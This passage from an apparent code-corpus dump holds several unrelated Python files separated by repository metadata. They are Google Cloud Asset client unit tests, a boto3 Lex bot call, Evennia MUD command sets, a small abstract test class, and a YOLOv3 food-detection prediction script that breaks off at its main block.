credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = asset_service.AnalyzeIamPolicyLongrunningRequest()
request.analysis_query.scope = 'analysis_query.scope/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.analyze_iam_policy_longrunning),
'__call__') as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(operations_pb2.Operation(name='operations/op'))
await client.analyze_iam_policy_longrunning(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'analysis_query.scope=analysis_query.scope/value',
) in kw['metadata']
def test_credentials_transport_error():
# It is an error to provide credentials and a transport instance.
transport = transports.AssetServiceGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# It is an error to provide a credentials file and a transport instance.
transport = transports.AssetServiceGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = AssetServiceClient(
client_options={"credentials_file": "credentials.json"},
transport=transport,
)
# It is an error to provide scopes and a transport instance.
transport = transports.AssetServiceGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = AssetServiceClient(
client_options={"scopes": ["1", "2"]},
transport=transport,
)
def test_transport_instance():
# A client may be instantiated with a custom transport instance.
transport = transports.AssetServiceGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
client = AssetServiceClient(transport=transport)
assert client.transport is transport
def test_transport_get_channel():
# A client may be instantiated with a custom transport instance.
transport = transports.AssetServiceGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
channel = transport.grpc_channel
assert channel
transport = transports.AssetServiceGrpcAsyncIOTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
channel = transport.grpc_channel
assert channel
@pytest.mark.parametrize("transport_class", [
transports.AssetServiceGrpcTransport,
transports.AssetServiceGrpcAsyncIOTransport,
])
def test_transport_adc(transport_class):
# Test default credentials are used if not provided.
with mock.patch.object(google.auth, 'default') as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport_class()
adc.assert_called_once()
def test_transport_grpc_default():
# A client should use the gRPC transport by default.
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
assert isinstance(
client.transport,
transports.AssetServiceGrpcTransport,
)
def test_asset_service_base_transport_error():
# Passing both a credentials object and credentials_file should raise an error
with pytest.raises(core_exceptions.DuplicateCredentialArgs):
transport = transports.AssetServiceTransport(
credentials=ga_credentials.AnonymousCredentials(),
credentials_file="credentials.json"
)
def test_asset_service_base_transport():
# Instantiate the base transport.
with mock.patch('google.cloud.asset_v1.services.asset_service.transports.AssetServiceTransport.__init__') as Transport:
Transport.return_value = None
transport = transports.AssetServiceTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
# Every method on the transport should just blindly
# raise NotImplementedError.
methods = (
'export_assets',
'list_assets',
'batch_get_assets_history',
'create_feed',
'get_feed',
'list_feeds',
'update_feed',
'delete_feed',
'search_all_resources',
'search_all_iam_policies',
'analyze_iam_policy',
'analyze_iam_policy_longrunning',
)
for method in methods:
with pytest.raises(NotImplementedError):
getattr(transport, method)(request=object())
# Additionally, the LRO client (a property) should
# also raise NotImplementedError
with pytest.raises(NotImplementedError):
transport.operations_client
@requires_google_auth_gte_1_25_0
def test_asset_service_base_transport_with_credentials_file():
# Instantiate the base transport with a credentials file
with mock.patch.object(google.auth, 'load_credentials_from_file', autospec=True) as load_creds, mock.patch('google.cloud.asset_v1.services.asset_service.transports.AssetServiceTransport._prep_wrapped_messages') as Transport:
Transport.return_value = None
load_creds.return_value = (ga_credentials.AnonymousCredentials(), None)
transport = transports.AssetServiceTransport(
credentials_file="credentials.json",
quota_project_id="octopus",
)
load_creds.assert_called_once_with("credentials.json",
scopes=None,
default_scopes=(
'https://www.googleapis.com/auth/cloud-platform',
),
quota_project_id="octopus",
)
@requires_google_auth_lt_1_25_0
def test_asset_service_base_transport_with_credentials_file_old_google_auth():
# Instantiate the base transport with a credentials file
with mock.patch.object(google.auth, 'load_credentials_from_file', autospec=True) as load_creds, mock.patch('google.cloud.asset_v1.services.asset_service.transports.AssetServiceTransport._prep_wrapped_messages') as Transport:
Transport.return_value = None
load_creds.return_value = (ga_credentials.AnonymousCredentials(), None)
transport = transports.AssetServiceTransport(
credentials_file="credentials.json",
quota_project_id="octopus",
)
load_creds.assert_called_once_with("credentials.json", scopes=(
'https://www.googleapis.com/auth/cloud-platform',
),
quota_project_id="octopus",
)
def test_asset_service_base_transport_with_adc():
# Test the default credentials are used if credentials and credentials_file are None.
with mock.patch.object(google.auth, 'default', autospec=True) as adc, mock.patch('google.cloud.asset_v1.services.asset_service.transports.AssetServiceTransport._prep_wrapped_messages') as Transport:
Transport.return_value = None
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport = transports.AssetServiceTransport()
adc.assert_called_once()
@requires_google_auth_gte_1_25_0
def test_asset_service_auth_adc():
# If no credentials are provided, we should use ADC credentials.
with mock.patch.object(google.auth, 'default', autospec=True) as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
AssetServiceClient()
adc.assert_called_once_with(
scopes=None,
default_scopes=(
'https://www.googleapis.com/auth/cloud-platform',
),
quota_project_id=None,
)
@requires_google_auth_lt_1_25_0
def test_asset_service_auth_adc_old_google_auth():
# If no credentials are provided, we should use ADC credentials.
with mock.patch.object(google.auth, 'default', autospec=True) as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
AssetServiceClient()
adc.assert_called_once_with(
scopes=( 'https://www.googleapis.com/auth/cloud-platform',),
quota_project_id=None,
)
@pytest.mark.parametrize(
"transport_class",
[
transports.AssetServiceGrpcTransport,
transports.AssetServiceGrpcAsyncIOTransport,
],
)
@requires_google_auth_gte_1_25_0
def test_asset_service_transport_auth_adc(transport_class):
# If credentials and host are not provided, the transport class should use
# ADC credentials.
with mock.patch.object(google.auth, 'default', autospec=True) as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport_class(quota_project_id="octopus", scopes=["1", "2"])
adc.assert_called_once_with(
scopes=["1", "2"],
default_scopes=( 'https://www.googleapis.com/auth/cloud-platform',),
quota_project_id="octopus",
)
@pytest.mark.parametrize(
"transport_class",
[
transports.AssetServiceGrpcTransport,
transports.AssetServiceGrpcAsyncIOTransport,
],
)
@requires_google_auth_lt_1_25_0
def test_asset_service_transport_auth_adc_old_google_auth(transport_class):
# If credentials and host are not provided, the transport class should use
# ADC credentials.
with mock.patch.object(google.auth, "default", autospec=True) as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport_class(quota_project_id="octopus")
adc.assert_called_once_with(scopes=(
'https://www.googleapis.com/auth/cloud-platform',
),
quota_project_id="octopus",
)
@pytest.mark.parametrize(
"transport_class,grpc_helpers",
[
(transports.AssetServiceGrpcTransport, grpc_helpers),
(transports.AssetServiceGrpcAsyncIOTransport, grpc_helpers_async)
],
)
@requires_api_core_gte_1_26_0
def test_asset_service_transport_create_channel(transport_class, grpc_helpers):
# If credentials and host are not provided, the transport class should use
# ADC credentials.
with mock.patch.object(google.auth, "default", autospec=True) as adc, mock.patch.object(
grpc_helpers, "create_channel", autospec=True
) as create_channel:
creds = ga_credentials.AnonymousCredentials()
adc.return_value = (creds, None)
transport_class(
quota_project_id="octopus",
scopes=["1", "2"]
)
create_channel.assert_called_with(
"cloudasset.googleapis.com:443",
credentials=creds,
credentials_file=None,
quota_project_id="octopus",
default_scopes=(
'https://www.googleapis.com/auth/cloud-platform',
),
scopes=["1", "2"],
default_host="cloudasset.googleapis.com",
ssl_credentials=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
@pytest.mark.parametrize(
"transport_class,grpc_helpers",
[
(transports.AssetServiceGrpcTransport, grpc_helpers),
(transports.AssetServiceGrpcAsyncIOTransport, grpc_helpers_async)
],
)
@requires_api_core_lt_1_26_0
def test_asset_service_transport_create_channel_old_api_core(transport_class, grpc_helpers):
# If credentials and host are not provided, the transport class should use
# ADC credentials.
with mock.patch.object(google.auth, "default", autospec=True) as adc, mock.patch.object(
grpc_helpers, "create_channel", autospec=True
) as create_channel:
creds = ga_credentials.AnonymousCredentials()
adc.return_value = (creds, None)
transport_class(quota_project_id="octopus")
create_channel.assert_called_with(
"cloudasset.googleapis.com:443",
credentials=creds,
credentials_file=None,
quota_project_id="octopus",
scopes=(
'https://www.googleapis.com/auth/cloud-platform',
),
ssl_credentials=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
@pytest.mark.parametrize(
"transport_class,grpc_helpers",
[
(transports.AssetServiceGrpcTransport, grpc_helpers),
(transports.AssetServiceGrpcAsyncIOTransport, grpc_helpers_async)
],
)
@requires_api_core_lt_1_26_0
def test_asset_service_transport_create_channel_user_scopes(transport_class, grpc_helpers):
# If credentials and host are not provided, the transport class should use
# ADC credentials.
with mock.patch.object(google.auth, "default", autospec=True) as adc, mock.patch.object(
grpc_helpers, "create_channel", autospec=True
) as create_channel:
creds = ga_credentials.AnonymousCredentials()
adc.return_value = (creds, None)
transport_class(quota_project_id="octopus", scopes=["1", "2"])
create_channel.assert_called_with(
"cloudasset.googleapis.com:443",
credentials=creds,
credentials_file=None,
quota_project_id="octopus",
scopes=["1", "2"],
ssl_credentials=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
@pytest.mark.parametrize("transport_class", [transports.AssetServiceGrpcTransport, transports.AssetServiceGrpcAsyncIOTransport])
def test_asset_service_grpc_transport_client_cert_source_for_mtls(
transport_class
):
cred = ga_credentials.AnonymousCredentials()
# Check ssl_channel_credentials is used if provided.
with mock.patch.object(transport_class, "create_channel") as mock_create_channel:
mock_ssl_channel_creds = mock.Mock()
transport_class(
host="squid.clam.whelk",
credentials=cred,
ssl_channel_credentials=mock_ssl_channel_creds
)
mock_create_channel.assert_called_once_with(
"squid.clam.whelk:443",
credentials=cred,
credentials_file=None,
scopes=(
'https://www.googleapis.com/auth/cloud-platform',
),
ssl_credentials=mock_ssl_channel_creds,
quota_project_id=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
# Check if ssl_channel_credentials is not provided, then client_cert_source_for_mtls
# is used.
with mock.patch.object(transport_class, "create_channel", return_value=mock.Mock()):
with mock.patch("grpc.ssl_channel_credentials") as mock_ssl_cred:
transport_class(
credentials=cred,
client_cert_source_for_mtls=client_cert_source_callback
)
expected_cert, expected_key = client_cert_source_callback()
mock_ssl_cred.assert_called_once_with(
certificate_chain=expected_cert,
private_key=expected_key
)
def test_asset_service_host_no_port():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
client_options=client_options.ClientOptions(api_endpoint='cloudasset.googleapis.com'),
)
assert client.transport._host == 'cloudasset.googleapis.com:443'
def test_asset_service_host_with_port():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
client_options=client_options.ClientOptions(api_endpoint='cloudasset.googleapis.com:8000'),
)
assert client.transport._host == 'cloudasset.googleapis.com:8000'
def test_asset_service_grpc_transport_channel():
channel = grpc.secure_channel('http://localhost/', grpc.local_channel_credentials())
# Check that channel is used if provided.
transport = transports.AssetServiceGrpcTransport(
host="squid.clam.whelk",
channel=channel,
)
assert transport.grpc_channel == channel
assert transport._host == "squid.clam.whelk:443"
assert transport._ssl_channel_credentials == None
def test_asset_service_grpc_asyncio_transport_channel():
channel = aio.secure_channel('http://localhost/', grpc.local_channel_credentials())
# Check that channel is used if provided.
transport = transports.AssetServiceGrpcAsyncIOTransport(
host="squid.clam.whelk",
channel=channel,
)
assert transport.grpc_channel == channel
assert transport._host == "squid.clam.whelk:443"
assert transport._ssl_channel_credentials == None
# Remove this test when deprecated arguments (api_mtls_endpoint, client_cert_source) are
# removed from grpc/grpc_asyncio transport constructor.
@pytest.mark.parametrize("transport_class", [transports.AssetServiceGrpcTransport, transports.AssetServiceGrpcAsyncIOTransport])
def test_asset_service_transport_channel_mtls_with_client_cert_source(
transport_class
):
with mock.patch("grpc.ssl_channel_credentials", autospec=True) as grpc_ssl_channel_cred:
with mock.patch.object(transport_class, "create_channel") as grpc_create_channel:
mock_ssl_cred = mock.Mock()
grpc_ssl_channel_cred.return_value = mock_ssl_cred
mock_grpc_channel = mock.Mock()
grpc_create_channel.return_value = mock_grpc_channel
cred = ga_credentials.AnonymousCredentials()
with pytest.warns(DeprecationWarning):
with mock.patch.object(google.auth, 'default') as adc:
adc.return_value = (cred, None)
transport = transport_class(
host="squid.clam.whelk",
api_mtls_endpoint="mtls.squid.clam.whelk",
client_cert_source=client_cert_source_callback,
)
adc.assert_called_once()
grpc_ssl_channel_cred.assert_called_once_with(
certificate_chain=b"cert bytes", private_key=b"key bytes"
)
grpc_create_channel.assert_called_once_with(
"mtls.squid.clam.whelk:443",
credentials=cred,
credentials_file=None,
scopes=(
'https://www.googleapis.com/auth/cloud-platform',
),
ssl_credentials=mock_ssl_cred,
quota_project_id=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
assert transport.grpc_channel == mock_grpc_channel
assert transport._ssl_channel_credentials == mock_ssl_cred
# Remove this test when deprecated arguments (api_mtls_endpoint, client_cert_source) are
# removed from grpc/grpc_asyncio transport constructor.
@pytest.mark.parametrize("transport_class", [transports.AssetServiceGrpcTransport, transports.AssetServiceGrpcAsyncIOTransport])
def test_asset_service_transport_channel_mtls_with_adc(
transport_class
):
mock_ssl_cred = mock.Mock()
with mock.patch.multiple(
"google.auth.transport.grpc.SslCredentials",
__init__=mock.Mock(return_value=None),
ssl_credentials=mock.PropertyMock(return_value=mock_ssl_cred),
):
with mock.patch.object(transport_class, "create_channel") as grpc_create_channel:
mock_grpc_channel = mock.Mock()
grpc_create_channel.return_value = mock_grpc_channel
mock_cred = mock.Mock()
with pytest.warns(DeprecationWarning):
transport = transport_class(
host="squid.clam.whelk",
credentials=mock_cred,
api_mtls_endpoint="mtls.squid.clam.whelk",
client_cert_source=None,
)
grpc_create_channel.assert_called_once_with(
"mtls.squid.clam.whelk:443",
credentials=mock_cred,
credentials_file=None,
scopes=(
'https://www.googleapis.com/auth/cloud-platform',
),
ssl_credentials=mock_ssl_cred,
quota_project_id=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
assert transport.grpc_channel == mock_grpc_channel
def test_asset_service_grpc_lro_client():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc',
)
transport = client.transport
# Ensure that we have a api-core operations client.
assert isinstance(
transport.operations_client,
operations_v1.OperationsClient,
)
# Ensure that subsequent calls to the property send the exact same object.
assert transport.operations_client is transport.operations_client
def test_asset_service_grpc_lro_async_client():
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc_asyncio',
)
transport = client.transport
# Ensure that we have a api-core operations client.
assert isinstance(
transport.operations_client,
operations_v1.OperationsAsyncClient,
)
# Ensure that subsequent calls to the property send the exact same object.
assert transport.operations_client is transport.operations_client
def test_asset_path():
expected = "*".format()
actual = AssetServiceClient.asset_path()
assert expected == actual
def test_parse_asset_path():
expected = {
}
path = AssetServiceClient.asset_path(**expected)
# Check that the path construction is reversible.
actual = AssetServiceClient.parse_asset_path(path)
assert expected == actual
def test_feed_path():
project = "squid"
feed = "clam"
expected = "projects/{project}/feeds/{feed}".format(project=project, feed=feed, )
actual = AssetServiceClient.feed_path(project, feed)
assert expected == actual
def test_parse_feed_path():
expected = {
"project": "whelk",
"feed": "octopus",
}
path = AssetServiceClient.feed_path(**expected)
# Check that the path construction is reversible.
actual = AssetServiceClient.parse_feed_path(path)
assert expected == actual
def test_common_billing_account_path():
billing_account = "oyster"
expected = "billingAccounts/{billing_account}".format(billing_account=billing_account, )
actual = AssetServiceClient.common_billing_account_path(billing_account)
assert expected == actual
def test_parse_common_billing_account_path():
expected = {
"billing_account": "nudibranch",
}
path = AssetServiceClient.common_billing_account_path(**expected)
# Check that the path construction is reversible.
actual = AssetServiceClient.parse_common_billing_account_path(path)
assert expected == actual
def test_common_folder_path():
folder = "cuttlefish"
expected = "folders/{folder}".format(folder=folder, )
actual = AssetServiceClient.common_folder_path(folder)
assert expected == actual
def test_parse_common_folder_path():
expected = {
"folder": "mussel",
}
path = AssetServiceClient.common_folder_path(**expected)
# Check that the path construction is reversible.
actual = AssetServiceClient.parse_common_folder_path(path)
assert expected == actual
def test_common_organization_path():
organization = "winkle"
expected = "organizations/{organization}".format(organization=organization, )
actual = AssetServiceClient.common_organization_path(organization)
assert expected == actual
def test_parse_common_organization_path():
expected = {
"organization": "nautilus",
}
path = AssetServiceClient.common_organization_path(**expected)
# Check that the path construction is reversible.
actual = AssetServiceClient.parse_common_organization_path(path)
assert expected == actual
def test_common_project_path():
project = "scallop"
expected = "projects/{project}".format(project=project, )
actual = AssetServiceClient.common_project_path(project)
assert expected == actual
def test_parse_common_project_path():
expected = {
"project": "abalone",
}
path = AssetServiceClient.common_project_path(**expected)
# Check that the path construction is reversible.
actual = AssetServiceClient.parse_common_project_path(path)
assert expected == actual
def test_common_location_path():
project = "squid"
location = "clam"
expected = "projects/{project}/locations/{location}".format(project=project, location=location, )
actual = AssetServiceClient.common_location_path(project, location)
assert expected == actual
def test_parse_common_location_path():
expected = {
"project": "whelk",
"location": "octopus",
}
path = AssetServiceClient.common_location_path(**expected)
# Check that the path construction is reversible.
actual = AssetServiceClient.parse_common_location_path(path)
assert expected == actual
def test_client_withDEFAULT_CLIENT_INFO():
client_info = gapic_v1.client_info.ClientInfo()
with mock.patch.object(transports.AssetServiceTransport, '_prep_wrapped_messages') as prep:
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
client_info=client_info,
)
prep.assert_called_once_with(client_info)
with mock.patch.object(transports.AssetServiceTransport, '_prep_wrapped_messages') as prep:
transport_class = AssetServiceClient.get_transport_class()
transport = transport_class(
credentials=ga_credentials.AnonymousCredentials(),
client_info=client_info,
)
prep.assert_called_once_with(client_info)
| [
"bazel-bot-development[bot]@users.noreply.github.com"
] | bazel-bot-development[bot]@users.noreply.github.com |
f622e236dad0ae272bf7f9ba003242f9017f8e62 | faf512a387355c5a6e5af59fc48aa2a79762344c | /playground/bot_runner.py | 2dfbcdc23780892642059da3e9d5e2c61716e453 | [
"Apache-2.0"
] | permissive | lawrencechen0921/ExcelLexBot | f80f848058af284f8595206a9e510baf21d013b1 | 97041c47c06ba42cb10630d78b2300b113b6b3bf | refs/heads/master | 2021-07-09T10:58:51.155580 | 2019-10-28T08:15:15 | 2019-10-28T08:15:15 | 229,690,075 | 0 | 0 | Apache-2.0 | 2021-03-20T05:10:26 | 2019-12-23T06:23:00 | null | UTF-8 | Python | false | false | 271 | py | import boto3
import json
client = boto3.client('lex-runtime', region_name='us-east-1')
response = client.post_text(
botName='ScheduleAppointmentBot',
botAlias='$LATEST',
userId='UserOne',
inputText='book a hotel')
print(json.dumps(response, indent=4))
| [
"[email protected]"
] | |
28fb47d43c5f1a043a47867a3eea10ad3e89707d | 53cb38bba0f95ddbffd83a9e45c9eed602694265 | /muddery/commands/default_cmdsets.py | 9564a9cc053c9b9d55621a2346b48167a0c66bd4 | [
"BSD-3-Clause"
] | permissive | elove88/muddery | 4356eb0203edeb26285b2bf032f410a8e6e4fb3b | 55dabb2d8d5fbf87ef0e7f2a2a0722251510a254 | refs/heads/master | 2021-09-05T23:30:33.835858 | 2018-01-31T13:50:26 | 2018-01-31T13:50:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,733 | py | """
Command sets
All commands in the game must be grouped in a cmdset. A given command
can be part of any number of cmdsets and cmdsets can be added/removed
and merged onto entities at runtime.
To create new commands to populate the cmdset, see
`commands/command.py`.
"""
import traceback
from evennia import CmdSet
from evennia import default_cmds
from muddery.commands import combat
from muddery.commands import general
from muddery.commands import player
from muddery.commands import unloggedin
class CharacterCmdSet(default_cmds.CharacterCmdSet):
"""
The `CharacterCmdSet` contains general in-game commands like `look`,
`goto`, etc available on in-game Character objects. It is merged with
the `PlayerCmdSet` when a Player puppets a Character.
"""
key = "DefaultCharacter"
def at_cmdset_creation(self):
"""
Populates the cmdset
"""
super(CharacterCmdSet, self).at_cmdset_creation()
#
# any commands you add below will overload the default ones.
#
self.add(general.CmdLook())
self.add(general.CmdGoto())
self.add(general.CmdInventory())
self.add(general.CmdTalk())
self.add(general.CmdDialogue())
self.add(general.CmdLoot())
self.add(general.CmdUse())
self.add(general.CmdDiscard())
self.add(general.CmdEquip())
self.add(general.CmdTakeOff())
self.add(general.CmdCastSkill())
self.add(general.CmdAttack())
self.add(general.CmdMakeMatch())
self.add(general.CmdGetRankings())
self.add(general.CmdQueueUpCombat())
self.add(general.CmdQuitCombatQueue())
self.add(general.CmdConfirmCombat())
self.add(general.CmdRejectCombat())
self.add(general.CmdUnlockExit())
self.add(general.CmdGiveUpQuest())
self.add(general.CmdShopping())
self.add(general.CmdBuy())
self.add(general.CmdSay())
self.add(general.CmdAction())
self.add(general.CmdTest())
# Add empty login commands to the normal cmdset to
# avoid showing wrong cmd messages.
self.add(general.CmdConnect())
self.add(general.CmdCreate())
self.add(general.CmdCreateConnect())
class AccountCmdSet(default_cmds.AccountCmdSet):
"""
This is the cmdset available to the Player at all times. It is
combined with the `CharacterCmdSet` when the Player puppets a
Character. It holds game-account-specific commands, channel
commands, etc.
"""
key = "DefaultAccount"
def at_cmdset_creation(self):
"""
Populates the cmdset
"""
super(AccountCmdSet, self).at_cmdset_creation()
#
# any commands you add below will overload the default ones.
#
self.add(player.CmdQuit())
self.add(player.CmdPuppet())
self.add(player.CmdUnpuppet())
self.add(player.CmdCharCreate())
self.add(player.CmdCharDelete())
self.add(player.CmdCharAll())
class UnloggedinCmdSet(default_cmds.UnloggedinCmdSet):
"""
Command set available to the Session before being logged in. This
holds commands like creating a new account, logging in, etc.
"""
key = "DefaultUnloggedin"
def at_cmdset_creation(self):
"""
Populates the cmdset.
"""
self.add(unloggedin.CmdUnconnectedLoginStart())
self.add(unloggedin.CmdUnconnectedLook())
self.add(unloggedin.CmdUnconnectedCreate())
self.add(unloggedin.CmdUnconnectedConnect())
self.add(unloggedin.CmdUnconnectedQuit())
self.add(unloggedin.CmdQuickLogin())
class SessionCmdSet(default_cmds.SessionCmdSet):
"""
This cmdset is made available on Session level once logged in. It
is empty by default.
"""
key = "DefaultSession"
def at_cmdset_creation(self):
"""
This is the only method defined in a cmdset, called during
its creation. It should populate the set with command instances.
As and example we just add the empty base `Command` object.
It prints some info.
"""
super(SessionCmdSet, self).at_cmdset_creation()
#
# any commands you add below will overload the default ones.
#
class CombatCmdSet(CmdSet):
"""
When players are in combat, the combat cmdset will replace the normal cmdset.
The normal cmdset will be recoverd when the combat is over.
"""
key = "combat_cmdset"
mergetype = "Replace"
priority = 10
no_exits = True
def at_cmdset_creation(self):
self.add(general.CmdLook())
self.add(general.CmdCastSkill())
self.add(combat.CmdCombatInfo())
| [
"[email protected]"
] | |
98981f55c9eccb1768ee4877f1033ddb4650bbc7 | 749cf1cfba5e0113b9619d46aa55edc7abb4aca4 | /src/scs_mfr/test/test.py | ecca4b9e84bbd9f1834c0eea55da6dda3ad04b4f | [
"MIT"
] | permissive | caspar/scs_mfr | b65fcd51e6561370f9fb1d6482f0717d7058e535 | 90f3604190c883c39ceddd1ce56a36d72e628e8d | refs/heads/master | 2020-03-22T22:07:35.063124 | 2018-07-06T12:20:38 | 2018-07-06T12:20:38 | 140,734,794 | 0 | 0 | null | 2018-07-12T15:52:36 | 2018-07-12T15:52:36 | null | UTF-8 | Python | false | false | 1,278 | py | """
Created on 18 May 2017
@author: Bruno Beloff ([email protected])
"""
from abc import abstractmethod
# --------------------------------------------------------------------------------------------------------------------
class Test(object):
"""
classdocs
"""
# ----------------------------------------------------------------------------------------------------------------
def __init__(self, verbose):
self.__verbose = verbose
self.__datum = None
# ----------------------------------------------------------------------------------------------------------------
@abstractmethod
def conduct(self):
pass
# ----------------------------------------------------------------------------------------------------------------
@property
def datum(self):
return self.__datum
@datum.setter
def datum(self, value):
self.__datum = value
@property
def verbose(self):
return self.__verbose
# ----------------------------------------------------------------------------------------------------------------
def __str__(self, *args, **kwargs):
return self.__class__.__name__ + ":{datum:%s, verbose:%s}" % (self.datum, self.verbose)
| [
"[email protected]"
] | |
0bb37f377bb2db2265a5c0135993cc684a7e3d92 | 467a828e4343c1da949b2ff3559dfbd3281124ab | /multi_detection/ckpt_predict_dir.py | 1985dbbcac6e23cf9cf1d99209193024fcb7a57d | [] | no_license | sunyihuan326/kx_detection | 59a45b09e65544e11a85debeec674fb5e427744c | ecdcc30e0c9afcf80684cc79c175a85f067c2c50 | refs/heads/master | 2021-06-19T04:06:54.821845 | 2021-05-11T08:01:11 | 2021-05-11T08:01:11 | 210,282,665 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,676 | py | # -*- encoding: utf-8 -*-
"""
预测一个文件夹图片结果
@File : ckpt_predict.py
@Time : 2019/12/16 15:45
@Author : sunyihuan
"""
import cv2
import numpy as np
import tensorflow as tf
import multi_detection.core.utils as utils
import os
import time
from multi_detection.food_correct_utils import correct_bboxes, get_potatoml
import shutil
from tqdm import tqdm
# gpu限制
config = tf.ConfigProto()
config.gpu_options.per_process_gpu_memory_fraction = 0.4
class YoloPredict(object):
'''
预测结果
'''
def __init__(self):
self.input_size = 416 # 输入图片尺寸(默认正方形)
self.num_classes = 40 # 种类数
self.score_cls_threshold = 0.001
self.score_threshold = 0.8
self.iou_threshold = 0.5
self.top_n = 5
self.weight_file = "E:/ckpt_dirs/Food_detection/multi_food5/20210224/yolov3_train_loss=5.9418.ckpt-148" # ckpt文件地址
# self.weight_file = "./checkpoint/yolov3_train_loss=4.7681.ckpt-80"
self.write_image = False # 是否画图
self.show_label = True # 是否显示标签
graph = tf.Graph()
with graph.as_default():
# 模型加载
self.saver = tf.train.import_meta_graph("{}.meta".format(self.weight_file))
self.sess = tf.Session(config=config)
self.saver.restore(self.sess, self.weight_file)
# 输入
self.input = graph.get_tensor_by_name("define_input/input_data:0")
self.trainable = graph.get_tensor_by_name("define_input/training:0")
# 输出检测结果
self.pred_sbbox = graph.get_tensor_by_name("define_loss/pred_sbbox/concat_2:0")
self.pred_mbbox = graph.get_tensor_by_name("define_loss/pred_mbbox/concat_2:0")
self.pred_lbbox = graph.get_tensor_by_name("define_loss/pred_lbbox/concat_2:0")
# 输出烤层结果
self.layer_num = graph.get_tensor_by_name("define_loss/layer_classes:0")
def get_top_cls(self, pred_bbox, org_h, org_w, top_n):
'''
获取top_n,类别和得分
:param pred_bbox:所有框
:param org_h:高
:param org_w:宽
:param top_n:top数
:return:按置信度前top_n个,输出类别、置信度,
例如
[(18, 0.9916), (19, 0.0105), (15, 0.0038), (1, 0.0018), (5, 0.0016), (13, 0.0011)]
'''
bboxes = utils.postprocess_boxes(pred_bbox, (org_h, org_w), self.input_size, self.score_cls_threshold)
classes_in_img = list(set(bboxes[:, 5]))
best_bboxes = {}
for cls in classes_in_img:
cls_mask = (bboxes[:, 5] == cls)
cls_bboxes = bboxes[cls_mask]
best_score = 0
for i in range(len(cls_bboxes)):
if cls_bboxes[i][-2] > best_score:
best_score = cls_bboxes[i][-2]
if int(cls) not in best_bboxes.keys():
best_bboxes[int(cls)] = round(best_score, 4)
best_bboxes = sorted(best_bboxes.items(), key=lambda best_bboxes: best_bboxes[1], reverse=True)
return best_bboxes[:top_n]
def predict(self, image):
'''
预测结果
:param image: 图片数据,shape为[800,600,3]
:return:
bboxes:食材检测预测框结果,格式为:[x_min, y_min, x_max, y_max, probability, cls_id],
layer_n[0]:烤层检测结果,0:最下层、1:中间层、2:最上层、3:其他
'''
org_image = np.copy(image)
org_h, org_w, _ = org_image.shape
image_data = utils.image_preporcess(image, [self.input_size, self.input_size])
image_data = image_data[np.newaxis, ...]
pred_sbbox, pred_mbbox, pred_lbbox, layer_n = self.sess.run(
[self.pred_sbbox, self.pred_mbbox, self.pred_lbbox, self.layer_num],
feed_dict={
self.input: image_data,
self.trainable: False
}
)
pred_bbox = np.concatenate([np.reshape(pred_sbbox, (-1, 5 + self.num_classes)),
np.reshape(pred_mbbox, (-1, 5 + self.num_classes)),
np.reshape(pred_lbbox, (-1, 5 + self.num_classes))], axis=0)
best_bboxes = self.get_top_cls(pred_bbox, org_h, org_w, self.top_n) # 获取top_n类别和置信度
bboxes = utils.postprocess_boxes(pred_bbox, (org_h, org_w), self.input_size, self.score_threshold)
bboxes = utils.nms(bboxes, self.iou_threshold)
return bboxes, layer_n[0], best_bboxes
def result(self, image_path, save_dir):
'''
得出预测结果并保存
:param image_path: 图片地址
:param save_dir: 预测结果原图标注框,保存地址
:return:
'''
image = cv2.imread(image_path) # 图片读取
# image = utils.white_balance(image) # 图片白平衡处理
bboxes_pr, layer_n, best_bboxes = self.predict(image) # 预测结果
if self.write_image:
image = utils.draw_bbox(image, bboxes_pr, show_label=self.show_label)
drawed_img_save_to_path = str(image_path).split("/")[-1]
drawed_img_save_to_path = str(drawed_img_save_to_path).split(".")[0] + "_" + str(
layer_n) + ".jpg" # 图片保存地址,烤层结果在命名中
# cv2.imshow('Detection result', image)
cv2.imwrite(save_dir + "/" + drawed_img_save_to_path, image) # 保存图片
return bboxes_pr, layer_n, best_bboxes
if __name__ == '__main__':
start_time = time.time()
